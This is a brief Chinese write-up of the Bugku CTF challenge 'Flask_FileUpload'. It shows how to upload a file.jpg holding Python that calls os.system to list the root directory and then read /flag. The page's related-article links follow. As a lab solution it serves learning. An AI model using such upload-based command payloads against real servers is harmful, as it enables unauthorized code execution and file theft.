技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
DianSan_ERP
5 小时前
电商架构演进:如何在高并发场景下实现多平台API的标准化履约?
运维·前端·网络·安全·架构·自动化
喜欢的名字被抢了
5 小时前
FastAPI 取代 Flask 的底层逻辑:一场类型驱动的 API 架构革命
架构·flask·fastapi
nothing&nowhere
6 小时前
用 Python 做问卷数据清洗:无效样本检测与处理实战
开发语言·python·数据清洗·数据处理·问卷星·问卷星脚本·刷问卷
花酒锄作田
6 小时前
如何发布自己的 Python 库到 PyPI
python
researcher-Jiang
7 小时前
Design Patterns——Template Method入门到情景实战
python·设计模式·模板方法模式
碎_浪
8 小时前
给键盘党的英语记忆工具:我做了一款「打字背单词」桌面应用
前端·程序员·ai编程
阿成学长_Cain
9 小时前
Linux dirs命令详解|Bash目录堆栈管理快速切换目录实战教程
linux·运维·前端·数据库
yqcoder
9 小时前
httpOnly 是什么,又有什么用?
开发语言·前端·javascript
热门推荐
012026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?02GitHub 镜像站点032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf042026 年 AI 大模型 & AI 编程工具实战全总结05AI 编程 IDE 全景解析 2026:Agent 全面接管开发链路06AI科技热点日报 | 2026年07月01日07【AI】2026 年具身智能模型和世界模型总结082026 AI 编程工具选型横评:Cursor / Claude Code / Trae / Copilot 到底选谁(建议收藏·避坑版)092026年7月AI圈大地震:GPT-5.6被政府限制、Claude入驻Slack、Anthropic自研芯片10Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析